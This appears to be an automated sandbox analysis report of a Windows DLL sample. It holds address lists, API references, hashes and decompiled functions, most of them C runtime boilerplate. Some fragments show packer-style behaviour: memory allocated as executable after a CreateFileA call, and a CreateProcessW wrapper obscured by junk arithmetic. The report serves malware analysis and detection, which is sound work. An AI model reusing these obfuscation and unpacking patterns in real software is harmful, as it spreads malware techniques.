0x6ea9c1cc
0x6ea9c1d0
0x6ea9c1d0
0x6ea9c1d8
0x6ea9c1d8
0x6ea9c1e3
0x6ea9c1e7
0x6ea9c1f7
0x6ea9c1fb
0x6ea9c205
0x6ea9c209
0x6ea9c21a
0x6ea9c221
0x6ea9c225
0x6ea9c243
0x6ea9c247
0x6ea9c249
0x6ea9c24c
0x6ea9c24e
0x6ea9c252
0x6ea9c254
0x6ea9c256
0x6ea9c25a
0x6ea9c25a
0x6ea9c260
0x6ea9c260
0x6ea9c262
0x6ea9c265
0x6ea9c269
0x6ea9c269
0x6ea9c269
0x6ea9c260
0x6ea9c272
0x6ea9c274
0x6ea9c278
0x6ea9c27a
0x6ea9c27c
0x6ea9c27c
0x6ea9c280
0x6ea9c284
0x6ea9c290
0x6ea9c298
0x6ea9c29a
0x6ea9c29e
0x6ea9c2a1
0x6ea9c2a3
0x6ea9c2a5
0x6ea9c2a7
0x6ea9c2aa
0x6ea9c2ad
0x6ea9c2b0
0x6ea9c2b0
0x6ea9c2b0
0x6ea9c2a5
0x6ea9c2b5
0x6ea9c2b8
0x6ea9c2b8
0x6ea9c280
0x6ea9c2c0
0x6ea9c2c5
0x6ea9c2c7
0x6ea9c2cb
0x6ea9c2ce
0x6ea9c2d0
0x6ea9c2d6
0x6ea9c2d6
0x6ea9c2d9
0x00000000
0x00000000
0x6ea9c2e8
0x6ea9c2ea
0x6ea9c2ee
0x6ea9c2f3
0x6ea9c2f5
0x6ea9c2f8
0x6ea9c2fa
0x6ea9c300
0x6ea9c300
0x6ea9c302
0x6ea9c326
0x6ea9c328
0x6ea9c328
0x6ea9c32f
0x6ea9c304
0x6ea9c304
0x6ea9c306
0x6ea9c308
0x00000000
0x6ea9c30a
0x6ea9c322
0x6ea9c322
0x6ea9c308
0x6ea9c333
0x6ea9c335
0x6ea9c338
0x6ea9c33a
0x6ea9c33d
0x6ea9c340
0x6ea9c343
0x6ea9c345
0x6ea9c345
0x6ea9c300
0x6ea9c34f
0x6ea9c353
0x6ea9c356
0x6ea9c35a
0x6ea9c35d
0x6ea9c35f
0x00000000
0x00000000
0x00000000
0x6ea9c35f
0x6ea9c2d6
0x6ea9c365
0x6ea9c367
0x6ea9c374
0x6ea9c37b
0x6ea9c37f
0x6ea9c385
0x6ea9c388
0x6ea9c38f
0x6ea9c39b
0x6ea9c39d
0x6ea9c3a1
0x6ea9c3a4
0x6ea9c3a6
0x6ea9c3b0
0x6ea9c3b2
0x6ea9c3b5
0x6ea9c3b7
0x6ea9c3b7
0x6ea9c3b9
0x6ea9c3bc
0x6ea9c3c0
0x6ea9c3c0
0x6ea9c3c4
0x6ea9c3c8
0x6ea9c3ca
0x6ea9c3ce
0x6ea9c3d2
0x6ea9c3df
0x6ea9c3e3
0x6ea9c3f0
0x6ea9c3f4
0x6ea9c407
0x6ea9c40b
0x6ea9c40d
0x6ea9c413
0x6ea9c413
0x6ea9c413
0x6ea9c413
0x6ea9c3f6
0x6ea9c401
0x6ea9c401
0x6ea9c3e5
0x6ea9c3eb
0x6ea9c3eb
0x6ea9c3d4
0x6ea9c3da
0x6ea9c3da
0x6ea9c417
0x6ea9c41a
0x6ea9c41a
0x6ea9c41e
0x6ea9c422
0x6ea9c422
0x6ea9c425
0x6ea9c429
0x6ea9c42b
0x6ea9c42f
0x6ea9c432
0x6ea9c432
0x6ea9c43a
0x6ea9c43a
0x6ea9c3a6
0x6ea9c441
0x6ea9c447
0x6ea9c44c
0x6ea9c453
0x6ea9c455
0x6ea9c457
0x6ea9c45b
0x6ea9c45d
0x6ea9c45f
0x6ea9c461
0x6ea9c463
0x6ea9c46a
0x6ea9c46c
0x6ea9c46f
0x6ea9c472
0x6ea9c472
0x6ea9c463
0x6ea9c45d
0x6ea9c476
0x6ea9c47a
0x6ea9c47e
0x6ea9c4d2
0x00000000
0x6ea9c480
0x6ea9c480
0x6ea9c483
0x6ea9c489
0x6ea9c48b
0x6ea9c48e
0x6ea9c490
0x6ea9c4d4
0x6ea9c4dc
0x6ea9c4dd
0x6ea9c4df
0x6ea9c4e0
0x6ea9c4ea
0x6ea9c492
0x6ea9c492
0x6ea9c496
0x6ea9c499
0x6ea9c49e
0x6ea9c49e
0x6ea9c4a8
0x6ea9c4b6
0x6ea9c4b8
0x6ea9c4b9
0x6ea9c4bb
0x6ea9c4c0
0x6ea9c4ca
0x6ea9c4ca
0x6ea9c490
0x6ea9c47e

APIs

CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6EA9C225
GetLastError.KERNEL32 ref: 6EA9C22B
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 6EA9C247

Strings

asd, xrefs: 6EA9C21C

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCreateErrorFileLastVirtual
String ID: asd
API String ID: 1112224254-4170839921
Opcode ID: 8b0d00c5e0449faabc1130585303ff4c304fa02644702dcaf27c8cf816ff0dfa
Instruction ID: a94f13840e2043d16ffebce7fa90fe22ff41b31ce2324531fe9203978796220e
Opcode Fuzzy Hash: 8b0d00c5e0449faabc1130585303ff4c304fa02644702dcaf27c8cf816ff0dfa
Instruction Fuzzy Hash: EFE1CC71A18B068FCB50CF98C890B2AB7E1FF88704F29456DE8948F345D731E895DB89

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9C8DB, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6EA9C8DB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;
				void* _t89;

				_t89 = __fp0;
				_t68 = __edx;
				_push(0x10);
				_push(0x6eadaf80);
				E6EA9D350(__ebx, __edi, __esi);
				_t34 =  *0x6eade174; // 0x0
				if(_t34 > 0) {
					 *0x6eade174 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6EA9CF32();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6eade4b8 - 2;
					if( *0x6eade4b8 != 2) {
						E6EA9D1CC(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6eadafa8);
						E6EA9D350(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6EA9CA96( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6EA9C781(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t42 = E6EA81290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t72); // executed
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6EA81290(_t58, _t72, _t76, _t89,  *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6EA9C8DB(_t58, _t68, _t72, _t76, _t25, _t89);
											_pop(_t61);
											E6EA9CA96( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6EA9C781(_t61,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6EA9CA96( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6eade174 - _t72; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6EA9CFFD(__ebx, _t61, 1, __esi);
						E6EA9CEB9();
						E6EA9D31B();
						 *0x6eade4b8 =  *0x6eade4b8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6EA9C970();
						_t54 = E6EA9D19E(_t61,  *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6EA9C97D();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6ea9c8db
0x6ea9c8db
0x6ea9c8db
0x6ea9c8dd
0x6ea9c8e2
0x6ea9c8e7
0x6ea9c8ee
0x6ea9c8f5
0x6ea9c8fd
0x6ea9c900
0x6ea9c909
0x6ea9c90c
0x6ea9c90f
0x6ea9c916
0x6ea9c985
0x6ea9c98a
0x6ea9c98b
0x6ea9c98d
0x6ea9c992
0x6ea9c997
0x6ea9c99a
0x6ea9c99c
0x6ea9c9ad
0x6ea9c9ad
0x6ea9c9b1
0x6ea9c9b4
0x6ea9c9c0
0x6ea9c9c0
0x6ea9c9cd
0x6ea9c9cf
0x6ea9c9d2
0x6ea9c9d4
0x6ea9c9df
0x6ea9c9e4
0x6ea9c9e6
0x6ea9c9e9
0x6ea9c9eb
0x00000000
0x00000000
0x6ea9c9eb
0x6ea9c9b6
0x6ea9c9b6
0x6ea9c9b9
0x00000000
0x6ea9c9bb
0x6ea9c9bb
0x6ea9c9f1
0x6ea9c9f1
0x6ea9c9f6
0x6ea9c9fb
0x6ea9c9fd
0x6ea9ca00
0x6ea9ca03
0x6ea9ca05
0x6ea9ca07
0x6ea9ca09
0x6ea9ca0e
0x6ea9ca13
0x6ea9ca15
0x6ea9ca15
0x6ea9ca1b
0x6ea9ca1c
0x6ea9ca21
0x6ea9ca27
0x6ea9ca27
0x6ea9ca07
0x6ea9ca2c
0x6ea9ca2e
0x6ea9ca35
0x6ea9ca3f
0x6ea9ca41
0x6ea9ca44
0x6ea9ca46
0x6ea9ca52
0x6ea9ca7a
0x6ea9ca7a
0x6ea9ca30
0x6ea9ca30
0x6ea9ca33
0x00000000
0x00000000
0x6ea9ca33
0x6ea9ca2e
0x6ea9c9b9
0x6ea9ca7d
0x6ea9ca84
0x6ea9c99e
0x6ea9c99e
0x6ea9c9a4
0x00000000
0x6ea9c9a6
0x6ea9c9a6
0x6ea9c9a6
0x6ea9c9a4
0x6ea9ca89
0x6ea9ca95
0x6ea9c918
0x6ea9c918
0x6ea9c91d
0x6ea9c922
0x6ea9c927
0x6ea9c92e
0x6ea9c932
0x6ea9c93c
0x6ea9c948
0x6ea9c94a
0x6ea9c94a
0x6ea9c94c
0x6ea9c94f
0x6ea9c956
0x6ea9c95b
0x00000000
0x6ea9c95b
0x6ea9c8f0
0x6ea9c8f0
0x6ea9c95d
0x6ea9c960
0x6ea9c96c
0x6ea9c96c

APIs

__RTC_Initialize.LIBCMT ref: 6EA9C922
___scrt_uninitialize_crt.LIBCMT ref: 6EA9C93C

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: c4bac712ca7e5ad65e9555a3af6757c2319b0820f7a282f7974726c254794771
Instruction ID: 53e03fc5d8c710d8110b9ef7581aea604785d43ada338220e46ed996fd52fc8c
Opcode Fuzzy Hash: c4bac712ca7e5ad65e9555a3af6757c2319b0820f7a282f7974726c254794771
Instruction Fuzzy Hash: CF41E472E24A25AFEB50CFE4C900BAE7AF9EF45B94F104915E8146F240D7344DC1EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9C98B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6EA9C98B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;
				void* _t53;

				_t53 = __fp0;
				_t40 = __edx;
				_push(0xc);
				_push(0x6eadafa8);
				E6EA9D350(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6EA9CA96( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6EA9C781(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t26 = E6EA81290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t42); // executed
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E6EA81290(_t35, _t42, _t45, _t53,  *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6EA9C8DB(_t35, _t40, _t42, _t45, _t14, _t53);
								_pop(_t37);
								E6EA9CA96( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6EA9C781(_t37,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6EA9CA96( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6eade174 - _t42; // 0x0
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6ea9c98b
0x6ea9c98b
0x6ea9c98b
0x6ea9c98d
0x6ea9c992
0x6ea9c997
0x6ea9c99c
0x6ea9c9ad
0x6ea9c9ad
0x6ea9c9b1
0x6ea9c9b4
0x6ea9c9c0
0x6ea9c9c0
0x6ea9c9cd
0x6ea9c9cf
0x6ea9c9d2
0x6ea9c9d4
0x6ea9ca7d
0x6ea9ca7d
0x6ea9ca84
0x6ea9ca86
0x6ea9ca89
0x6ea9ca95
0x6ea9ca95
0x6ea9c9df
0x6ea9c9e4
0x6ea9c9e6
0x6ea9c9e9
0x6ea9c9eb
0x00000000
0x00000000
0x6ea9c9f1
0x6ea9c9f1
0x6ea9c9f6
0x6ea9c9fb
0x6ea9c9fd
0x6ea9ca00
0x6ea9ca03
0x6ea9ca05
0x6ea9ca07
0x6ea9ca09
0x6ea9ca0e
0x6ea9ca13
0x6ea9ca15
0x6ea9ca15
0x6ea9ca1b
0x6ea9ca1c
0x6ea9ca21
0x6ea9ca27
0x6ea9ca27
0x6ea9ca07
0x6ea9ca2c
0x6ea9ca2e
0x6ea9ca35
0x6ea9ca3f
0x6ea9ca41
0x6ea9ca44
0x6ea9ca46
0x6ea9ca52
0x6ea9ca7a
0x6ea9ca7a
0x00000000
0x6ea9ca30
0x6ea9ca30
0x6ea9ca33
0x00000000
0x00000000
0x00000000
0x6ea9ca33
0x6ea9ca2e
0x6ea9c9b6
0x6ea9c9b9
0x00000000
0x00000000
0x6ea9c9bb
0x00000000
0x6ea9c9bb
0x6ea9c99e
0x6ea9c9a4
0x00000000
0x00000000
0x6ea9c9a6
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6EA9C9C8
dllmain_crt_dispatch.LIBCMT ref: 6EA9C9DF
dllmain_raw.LIBCMT ref: 6EA9CA27
dllmain_crt_dispatch.LIBCMT ref: 6EA9CA3A
dllmain_raw.LIBCMT ref: 6EA9CA4D

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 40f801256b9357715a4f6888f223c8c8adcbcd5837b9d6a88ae534ee677d4b85
Instruction ID: 40c8e882faf92f74eabdf051d34a68f5af43db06ff9e34b333687a6c43c5f5d7
Opcode Fuzzy Hash: 40f801256b9357715a4f6888f223c8c8adcbcd5837b9d6a88ae534ee677d4b85
Instruction Fuzzy Hash: DE219172D20A25AFDB51CFA5C940EAF3AEEEB81B94F054515F8146E250D3308D81AB98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C2A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA8C2A0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WakeByAddressSingle");
				}
			}

0x6ea8c2a5
0x6ea8c2ad
0x6ea8c2bc
0x6ea8c2af
0x6ea8c2bb
0x6ea8c2bb

APIs

GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6EA8C2A5
GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6EA8C2B5

Strings

WakeByAddressSingle, xrefs: 6EA8C2AF
api-ms-win-core-synch-l1-2-0, xrefs: 6EA8C2A0

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1731903895
Opcode ID: 2663977e28bf9037fe27c0cc5e950d6110235fc109cefd02bd3ac4003dba5848
Instruction ID: c01e2e19002edf07fc6be4b9e2abaf361726a9e0b98d77dc48736a3ecc2c3a8b
Opcode Fuzzy Hash: 2663977e28bf9037fe27c0cc5e950d6110235fc109cefd02bd3ac4003dba5848
Instruction Fuzzy Hash: 97B09BB0940B025FDED06AF5494C68A25D6B54125130144446511FD141F51484459D25

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C320, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA8C320() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("api-ms-win-core-synch-l1-2-0"); // executed
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "WaitOnAddress");
				}
			}

0x6ea8c325
0x6ea8c32d
0x6ea8c33c
0x6ea8c32f
0x6ea8c33b
0x6ea8c33b

APIs

GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6EA8C325
GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6EA8C335

Strings

WaitOnAddress, xrefs: 6EA8C32F
api-ms-win-core-synch-l1-2-0, xrefs: 6EA8C320

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
API String ID: 1646373207-1891578837
Opcode ID: e2da66184c7fa75f8df1440b2c8407ba31e771203747d6e6f67d3c37141897a6
Instruction ID: 178b4225f203bd9310fe51098f903364e25aff6a206ccab47ad0c8315c2bf948
Opcode Fuzzy Hash: e2da66184c7fa75f8df1440b2c8407ba31e771203747d6e6f67d3c37141897a6
Instruction Fuzzy Hash: 13B092B0E00B026EDE90AAF5998CA8B299AB96135230285406016ED201EA24C4869D2A

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA4161, Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6EAA4169

Part of subcall function 6EAA4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6EAA61E2,?,00000000,-00000008), ref: 6EAA411F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EAA41A1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EAA41C1

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: f99e19f8abfc132c7a3ea0f781d39cdd0c3608e1c16e8ff7e60b937655c10244
Instruction ID: 90602fb5cfdba05b8720ad7f88f03446a59e77f27719cba5b8afa4ecac0abd23
Opcode Fuzzy Hash: f99e19f8abfc132c7a3ea0f781d39cdd0c3608e1c16e8ff7e60b937655c10244
Instruction Fuzzy Hash: 9111A1B1505B167E66021BFE5D89CAF7DADDE562993104826F601E7100EF648D8382B9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA81290, Relevance: 3.9, APIs: 3, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BE96
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BEB4
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BECD
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BECF
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BED6
Part of subcall function 6EA9BE60: GetTickCount64.KERNEL32 ref: 6EA9BEF4

GetProcessHeap.KERNEL32 ref: 6EA81333
HeapAlloc.KERNEL32(02D40000,00000000,00023800), ref: 6EA8134D
HeapFree.KERNEL32(00000000), ref: 6EA81437

Memory Dump Source

Source File: 00000002.00000002.598535305.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000002.00000002.598492009.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.598909435.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.599255697.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.599275726.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.599287805.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$Heap$AllocFreeProcess
String ID:
API String ID: 2047189075-0
Opcode ID: 1bf45a60eaf8aa67de0f14661517c0868c9914e86537ddf08c37fa6ed317a686
Instruction ID: 7fee8f7ef4cd48b302f60963a38dd7f735bd21a1515c931f720f1bed34ba855e
Opcode Fuzzy Hash: 1bf45a60eaf8aa67de0f14661517c0868c9914e86537ddf08c37fa6ed317a686
Instruction Fuzzy Hash: 5151B074A10B408BD320CF69C940AA7BBF5FF59314F548A2DE8D68BA51D734F585CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00989100, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00989100(void* __ecx, WCHAR* __edx, WCHAR* _a8, struct _PROCESS_INFORMATION* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _STARTUPINFOW* _a40, intOrPtr _a44, int _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t52;
				int _t60;
				WCHAR* _t64;

				_t64 = __edx;
				_push(0);
				_push(0);
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E00978002(_t52);
				_v28 = 0x2905a5;
				_v24 = 0;
				_v12 = 0xa2d8b8;
				_v12 = _v12 + 0xfffff871;
				_v12 = _v12 ^ 0x5b121ec8;
				_v12 = _v12 ^ 0x21b4fd5f;
				_v12 = _v12 ^ 0x7a067dbd;
				_v8 = 0x36027e;
				_v8 = _v8 ^ 0x6c06375b;
				_v8 = _v8 * 0x51;
				_v8 = _v8 + 0xffff0cdd;
				_v8 = _v8 ^ 0x3b3a0501;
				_v20 = 0x3133e6;
				_v20 = _v20 ^ 0xa81fc925;
				_v20 = _v20 ^ 0xa82b7027;
				_v16 = 0x47f0fa;
				_v16 = _v16 | 0xed8e49a9;
				_v16 = _v16 ^ 0xedcdbeb4;
				E0098E399(__ecx, __edx, __ecx, 0xa2449830, 0x53, 0xa9376bff);
				_t60 = CreateProcessW(_t64, _a8, 0, 0, _a48, 0, 0, 0, _a40, _a16); // executed
				return _t60;
			}

0x0098910a
0x0098910c
0x0098910d
0x0098910e
0x00989111
0x00989114
0x00989117
0x0098911a
0x0098911d
0x00989120
0x00989123
0x00989126
0x00989127
0x0098912a
0x0098912d
0x00989130
0x00989133
0x00989134
0x00989137
0x00989138
0x00989139
0x0098913a
0x0098913f
0x00989149
0x0098914c
0x00989153
0x0098915a
0x00989161
0x00989168
0x0098916f
0x00989176
0x0098918e
0x00989191
0x00989198
0x0098919f
0x009891a6
0x009891ad
0x009891b4
0x009891bb
0x009891c2
0x009891d5
0x009891ef
0x009891f6

APIs

